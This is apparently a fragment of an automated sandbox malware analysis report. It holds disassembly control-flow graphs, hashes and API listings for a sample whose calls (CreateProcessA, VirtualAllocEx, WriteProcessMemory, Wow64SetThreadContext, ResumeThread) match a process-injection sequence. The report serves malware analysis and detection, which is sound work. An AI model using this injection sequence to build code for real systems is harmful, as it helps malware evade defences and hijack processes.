                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: &$&$&$&$&$-$-$-$-$-$4$4$4$4$4$5$5$5$5$5$:$:$:$:$:$>$>$>$>$>$>$>$>$>$>$P$P$P$P$P$T$T$T$T$T$U$U$U$U$U$Z$Z$Z$Z$Z$[$[$[$[$[$^$^$^$^$^
                                                                                                                                                                                                                                          • API String ID: 0-2631824096
                                                                                                                                                                                                                                          • Opcode ID: fdc6bbb14d60d8d90860ba5cbbfb4cde46a8187ba13c784f17a4a6cf3518c566
                                                                                                                                                                                                                                          • Instruction ID: 1c9cbade5a2f1d3f66a7b024842cecc635f20791415a63e508282299948e8d33
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdc6bbb14d60d8d90860ba5cbbfb4cde46a8187ba13c784f17a4a6cf3518c566
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8ED2D2B4D01A298FDB64DF29DD447AABBB2BB89301F1081E9D40CA7355DB799E81CF04
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2cce8b1ab388acde3483e716349ef38ebfabd79b504bf16d549c3a8c9d1d200d
                                                                                                                                                                                                                                          • Instruction ID: dc765b77515f120cc7159aab505457b915adb493f3460dab24ac81d02bb289cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cce8b1ab388acde3483e716349ef38ebfabd79b504bf16d549c3a8c9d1d200d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09627F35B00215DFDF14DF69D884AADB7B3BF88711B1581A9E816AB360DB31ED42CB90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 508 4c35efa-4c35f09 509 4c35f0f-4c35f21 508->509 510 4c35fde-4c35fe1 508->510 512 4c35f23-4c35f26 509->512 513 4c35f36-4c35f39 509->513 516 4c35fab-4c35fb1 512->516 517 4c35f2c-4c35f2f 512->517 514 4c35f3b-4c35f3e 513->514 515 4c35f49-4c35f4f 513->515 518 4c35f44 514->518 519 4c35fda-4c35fdc 514->519 520 4c35f51-4c35f53 515->520 521 4c35f55-4c35f61 515->521 522 4c35fb3-4c35fb5 516->522 523 4c35fb7-4c35fc3 516->523 524 4c35f31 517->524 525 4c35f7a-4c35f80 517->525 518->519 519->510 528 4c35fe2-4c36064 519->528 526 4c35f63-4c35f78 520->526 521->526 527 4c35fc5-4c35fd8 522->527 523->527 524->519 529 4c35f82-4c35f84 525->529 530 4c35f86-4c35f92 525->530 526->519 527->519 546 4c36066-4c3606c 528->546 547 4c3607c-4c36084 528->547 533 4c35f94-4c35fa9 529->533 530->533 533->519 548 4c36070-4c3607a 546->548 549 4c3606e 546->549 550 4c36230-4c36232 547->550 551 4c3608a-4c3608c 547->551 548->547 549->547 552 4c36234-4c36239 550->552 553 4c3623c-4c36243 550->553 551->550 554 4c36092-4c36096 551->554 552->553 556 4c36180-4c36188 554->556 557 4c3609c-4c360a4 554->557 556->550 558 4c3618e-4c36192 556->558 557->550 559 4c360aa-4c360ae 557->559 560 4c36194-4c361a3 558->560 561 4c361cc-4c361db 558->561 562 4c360b0-4c360bf 559->562 563 4c360eb-4c360fe 559->563 560->550 569 4c361a9-4c361ac 560->569 561->550 570 4c361dd-4c361e0 561->570 562->550 571 4c360c5-4c360c8 562->571 563->550 568 4c36104 563->568 572 4c36107-4c3610d 568->572 573 4c361af-4c361b2 569->573 574 4c361e3-4c361ec 570->574 575 4c360cb-4c360ce 571->575 576 4c36113-4c36119 572->576 577 4c3624b-4c3628a 572->577 573->577 578 4c361b8-4c361c0 573->578 574->577 579 4c361ee-4c361f3 574->579 575->577 580 4c360d4-4c360dc 575->580 581 4c3611b-4c3612b 576->581 582 4c3616d-4c36170 576->582 597 4c362a1-4c362b3 call 4c32068 577->597 598 4c3628c-4c36290 577->598 583 4c36246 578->583 584 4c361c6-4c361c8 578->584 585 4c36227-4c3622a 579->585 586 4c361f5-4c361fb 579->586 580->583 587 4c360e2-4c360e4 580->587 581->582 603 4c3612d-4c36139 581->603 582->583 592 4c36176-4c36179 582->592 583->577 584->573 591 4c361ca 584->591 585->583 590 4c3622c-4c3622e 585->590 586->577 588 4c361fd-4c36205 586->588 587->575 589 4c360e6 587->589 588->577 594 4c36207-4c3620d 588->594 589->550 590->550 590->574 591->550 592->572 596 4c3617b 592->596 594->585 601 4c3620f-4c3621a 594->601 596->550 609 4c362b5-4c362bb 597->609 610 4c362be-4c362cb 597->610 599 4c36607-4c3664d call 4c32100 598->599 600 4c36296-4c3629e call 4c30170 598->600 623 4c36655-4c36657 599->623 624 4c3664f-4c36653 599->624 600->597 601->577 605 4c3621c-4c36220 601->605 603->577 607 4c3613f-4c36147 603->607 605->585 607->577 611 4c3614d-4c3615c 607->611 609->610 616 4c362db-4c362f0 610->616 617 4c362cd-4c362d6 610->617 611->577 613 4c36162-4c36166 611->613 613->582 625 4c362f6-4c36303 616->625 626 4c363c9-4c363fa call 4c32368 616->626 617->626 628 4c366c7-4c366ce 623->628 624->623 627 4c36659-4c36662 624->627 625->626 633 4c36309-4c3631c call 4c35e68 625->633 644 4c363ff-4c36401 626->644 631 4c366d6-4c36710 627->631 632 4c36664-4c3667e 627->632 652 4c36712 631->652 653 4c36717-4c36b3e call 4c30fc0 * 2 631->653 640 4c36680 632->640 641 4c366c4 632->641 642 4c36356-4c36366 call 4c35f00 633->642 643 4c3631e-4c36324 633->643 645 4c36683-4c36688 640->645 641->628 657 4c3636a-4c36376 642->657 658 4c36368 642->658 648 4c36326-4c36328 643->648 649 4c3632a-4c36336 643->649 650 4c365fc-4c36604 644->650 645->631 651 4c3668a-4c366b1 645->651 655 4c36338-4c36345 648->655 649->655 672 4c366b3-4c366b7 651->672 673 4c366ba-4c366bd 651->673 652->653 771 4c36b44 call 4c38060 653->771 772 4c36b44 call 4c3813c 653->772 655->642 665 4c36347-4c36354 655->665 661 4c36378-4c36387 657->661 658->661 669 4c363a0-4c363a4 661->669 665->642 677 4c36389-4c3639e 665->677 675 4c363a6-4c363ad 669->675 676 4c363af-4c363b1 669->676 672->673 678 4c366d1 673->678 679 4c366bf-4c366c2 673->679 675->676 681 4c363b6-4c363c4 675->681 676->650 677->669 678->631 679->641 679->645 681->626 681->650 699 4c36b4a-4c37a97 call 4c30fc0 * 3 773 4c37a9d call 4c38060 699->773 774 4c37a9d call 4c3813c 699->774 770 4c37aa3-4c37dbe 771->699 772->699 773->770 774->770
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3e7181741fe6aed459619830f29ac96653ef2e681e92de0831e333b3fc961d44
                                                                                                                                                                                                                                          • Instruction ID: d6056f6d96ff4f9c11514771dc3fa854c9c1e34cd42577e84f2da07f92c03340
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e7181741fe6aed459619830f29ac96653ef2e681e92de0831e333b3fc961d44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F1B435B00215EFDB25DF64C5846AE7BB3BF85302F158069E845AB2A1DB31FD42CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 775 4c30839-4c30868 776 4c3086a 775->776 777 4c3086f-4c30875 775->777 776->777 778 4c3087f-4c308a6 777->778 781 4c308b1-4c308b4 778->781 782 4c308bd-4c30975 781->782 792 4c3097f-4c30984 782->792 859 4c30987 call 4c30fc0 792->859 860 4c30987 call 4c30fb0 792->860 793 4c3098d-4c30999 call 4c311e0 794 4c3099f-4c309bc 793->794 796 4c309c4-4c309d6 call 4c31319 794->796 797 4c309dc-4c30c22 796->797 819 4c30c2a-4c30c45 call 4c31319 797->819 820 4c30c4b-4c30f66 819->820 855 4c30f6e-4c30f89 call 4c31319 820->855 856 4c30f8f-4c30f99 855->856 859->793 860->793
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e1908ae5b0c9dcd756bdbade1ddcb039a5f2d6fbe7ce21849fbbfcbe768e702f
                                                                                                                                                                                                                                          • Instruction ID: 956e65ce02f6ed9e068c97b2c0d7cb038b6a7749851dfbe834040a1ffa68560a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1908ae5b0c9dcd756bdbade1ddcb039a5f2d6fbe7ce21849fbbfcbe768e702f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A722D574A00218DFDB24EFA0D950BADBBB2FF89300F1085A9D9096B365DB355D85DF50

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 863 4c30848-4c30868 864 4c3086a 863->864 865 4c3086f-4c30984 863->865 864->865 947 4c30987 call 4c30fc0 865->947 948 4c30987 call 4c30fb0 865->948 881 4c3098d-4c30f89 call 4c311e0 call 4c31319 * 3 944 4c30f8f-4c30f99 881->944 947->881 948->881
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 22f1bfaf85550b330d0d3cfdefc2726583f4fe6574a0fe52035323b710d94dc5
                                                                                                                                                                                                                                          • Instruction ID: 636f88c330b0957b7443aa11607c751b54cc2b9814af56f2b47e41f59850a538
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22f1bfaf85550b330d0d3cfdefc2726583f4fe6574a0fe52035323b710d94dc5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3612D574A00218DFDB24EFA0D950BAEBBB2FF89300F1085A9D9096B365DB355D85DF50

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 122 4e30a18-4e30ab1 124 4e30ab3-4e30aca 122->124 125 4e30afa-4e30b22 122->125 124->125 128 4e30acc-4e30ad1 124->128 129 4e30b24-4e30b38 125->129 130 4e30b68-4e30bbe 125->130 131 4e30ad3-4e30add 128->131 132 4e30af4-4e30af7 128->132 129->130 137 4e30b3a-4e30b3f 129->137 139 4e30bc0-4e30bd4 130->139 140 4e30c04-4e30cf2 CreateProcessA 130->140 133 4e30ae1-4e30af0 131->133 134 4e30adf 131->134 132->125 133->133 138 4e30af2 133->138 134->133 141 4e30b62-4e30b65 137->141 142 4e30b41-4e30b4b 137->142 138->132 139->140 148 4e30bd6-4e30bdb 139->148 158 4e30cf4-4e30cfa 140->158 159 4e30cfb-4e30de0 140->159 141->130 143 4e30b4f-4e30b5e 142->143 144 4e30b4d 142->144 143->143 147 4e30b60 143->147 144->143 147->141 150 4e30bfe-4e30c01 148->150 151 4e30bdd-4e30be7 148->151 150->140 152 4e30beb-4e30bfa 151->152 153 4e30be9 151->153 152->152 154 4e30bfc 152->154 153->152 154->150 158->159 171 4e30de2-4e30de6 159->171 172 4e30df0-4e30df4 159->172 171->172 173 4e30de8 171->173 174 4e30df6-4e30dfa 172->174 175 4e30e04-4e30e08 172->175 173->172 174->175 176 4e30dfc 174->176 177 4e30e0a-4e30e0e 175->177 178 4e30e18-4e30e1c 175->178 176->175 177->178 181 4e30e10 177->181 179 4e30e52-4e30e5d 178->179 180 4e30e1e-4e30e47 178->180 180->179 181->178
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E30CDF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                          • Opcode ID: f95f5fd48c59ee9d13f4b5b63557bc8a83746d6a3aa6c608cc401ca6abccebca
                                                                                                                                                                                                                                          • Instruction ID: 3fbaeefeceab6b5e253fe323c958452b31c5066422df2b49033bb1a1ff95a745
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f95f5fd48c59ee9d13f4b5b63557bc8a83746d6a3aa6c608cc401ca6abccebca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C11671D002298FDF25CFA9C844BEEBBB1BF49304F0095A9D449B7244DB74AA85CF95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 185 4e30690-4e306fb 187 4e30712-4e30773 WriteProcessMemory 185->187 188 4e306fd-4e3070f 185->188 190 4e30775-4e3077b 187->190 191 4e3077c-4e307ce 187->191 188->187 190->191
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E30763
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                                                                                          • Opcode ID: 9e74fd0cc092acd8e6cfe9ef79733ab4774e88e7090f88da2bb58cdd818c9ecc
                                                                                                                                                                                                                                          • Instruction ID: 287c5893e4c4f2b561e2eacaad1cdccddb014e03b7934120fe59606ee5d18874
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e74fd0cc092acd8e6cfe9ef79733ab4774e88e7090f88da2bb58cdd818c9ecc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 614198B5D012589FDF00DFA9D984AEEBBF1BF49310F14902AE818B7240D779AA45CF64

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 196 4e307e8-4e308aa ReadProcessMemory 199 4e308b3-4e30905 196->199 200 4e308ac-4e308b2 196->200 200->199
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E3089A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                                                                                                          • Opcode ID: 4d14eb96f7104e5732880d30e3ac0292861c86773c49968d29f96295b931b07c
                                                                                                                                                                                                                                          • Instruction ID: 29835e1943f74915f23b16ca75eb765d3a4dd06cbe6ee045bd93cad1fbd7f05b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d14eb96f7104e5732880d30e3ac0292861c86773c49968d29f96295b931b07c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3541A9B5D042589FDF10CFAAD884AEEFBB1BF09310F10A42AE814B7240D775A945CF68

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 205 4e30168-4e30222 VirtualAllocEx 208 4e30224-4e3022a 205->208 209 4e3022b-4e30275 205->209 208->209
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E30212
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: f9587d324e777e06542851bd37dbf393b67eaf70b922132ae2b0492fc356b01e
                                                                                                                                                                                                                                          • Instruction ID: 26074ab26d6fad40250a43b9a09624f67a82382b44f065d1270a3f2f56354ae6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9587d324e777e06542851bd37dbf393b67eaf70b922132ae2b0492fc356b01e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B531A6B9D042589FCF10CFA9D884AEEFBB5BB49310F10A42AE814B7200D775A945CF68

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 214 4e30040-4e300a0 216 4e300a2-4e300b4 214->216 217 4e300b7-4e300ff Wow64SetThreadContext 214->217 216->217 219 4e30101-4e30107 217->219 220 4e30108-4e30154 217->220 219->220
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 04E300EF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                                                                                          • Opcode ID: 4ea33fd2deec8fe092b7040a188d8fd4ef0fd2cdce8021682be3e53ca249f07c
                                                                                                                                                                                                                                          • Instruction ID: 73e1e6abec8a596b357c46562356cf997fd8529b2bf5e6d3a78c41204c22f6da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea33fd2deec8fe092b7040a188d8fd4ef0fd2cdce8021682be3e53ca249f07c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3031CDB5D012589FDB10CFAAD884AEEFBF0BF49314F14906AE418B7240D779A985CF64

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 225 4c3fe52-4c3fee6 ResumeThread 228 4c3fee8-4c3feee 225->228 229 4c3feef-4c3ff31 225->229 228->229
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 04C3FED6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                          • Opcode ID: 7e72cb5e9ff51c0c2535a1d16f69d8474deefc1786606bb765612a3c3bef6606
                                                                                                                                                                                                                                          • Instruction ID: 0c6c6e361c8e750eb46059dce2b1d63ac4486099c6096313ac3bee224d4ff78b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e72cb5e9ff51c0c2535a1d16f69d8474deefc1786606bb765612a3c3bef6606
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8531EBB5D012589FDB10CFAAD881AEEFBB1BF49310F14946AE814B7300C774A941CFA4

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 234 4c3fe58-4c3fee6 ResumeThread 237 4c3fee8-4c3feee 234->237 238 4c3feef-4c3ff31 234->238 237->238
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 04C3FED6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                          • Opcode ID: 62d07cf530a117f7e836156f4ecfda3d5f95ff17084a259ec360aa9d4db6a022
                                                                                                                                                                                                                                          • Instruction ID: e8725f4e0b191499945b18df527aba4226027dd9eada2beac24653a356e1407f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d07cf530a117f7e836156f4ecfda3d5f95ff17084a259ec360aa9d4db6a022
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8231C9B5D012589FDB10CFAAD880AEEFBB5AB49310F14946AE814B7300C775A941CFA8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: UUUU$UUUU$X$c{
                                                                                                                                                                                                                                          • API String ID: 0-153604399
                                                                                                                                                                                                                                          • Opcode ID: e50b0e5d82009fcd08ee19484bb32409f72aef3f8697494a06b432c944379685
                                                                                                                                                                                                                                          • Instruction ID: ffd8d958c6e195c0e91cddb23a0b2e057540809497a0d66500310c1163cdfd92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e50b0e5d82009fcd08ee19484bb32409f72aef3f8697494a06b432c944379685
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC819171E102289FDB64CFA9C981B9DFBF2BF89300F1481A9E54CE7255D7349A858F01
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1356285627.0000000004E30000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4e10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8b1cd8d7e042b36d1f1ea047f1cfa04c210e08b92655a8bc4a54ba75b45013f1
                                                                                                                                                                                                                                          • Instruction ID: 98318eacb113a99ce70ce6915ff7ebe4a5f17dfa9f7550389ae62e04640bc887
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b1cd8d7e042b36d1f1ea047f1cfa04c210e08b92655a8bc4a54ba75b45013f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16B1CDA289E3D05FE7138770597A6907FB26E13214B1F89DBC8C1DF0A3D2495A5AD332
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8bab73fb131916ef413e65488d0a1abb3125254599721a66277489936711ef96
                                                                                                                                                                                                                                          • Instruction ID: ec45ca5a8cd1f09cba95cd3c5132f20a06901bdbe14300b18b93b0f037490e2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bab73fb131916ef413e65488d0a1abb3125254599721a66277489936711ef96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC516F70A19209CFDB45EFB6E84069E7BF2FFC6310F04C129D004AB3A5EBB559068B90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1354713329.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4c30000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 062cc1744098e3910b0579f96bdac96ad7f295281e62b779a8e25fd65f1e0401
                                                                                                                                                                                                                                          • Instruction ID: 9e5453811ff31cde62405a12b45474eb30f1304ff3c88bef5bc457d05bee0e9a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 062cc1744098e3910b0579f96bdac96ad7f295281e62b779a8e25fd65f1e0401
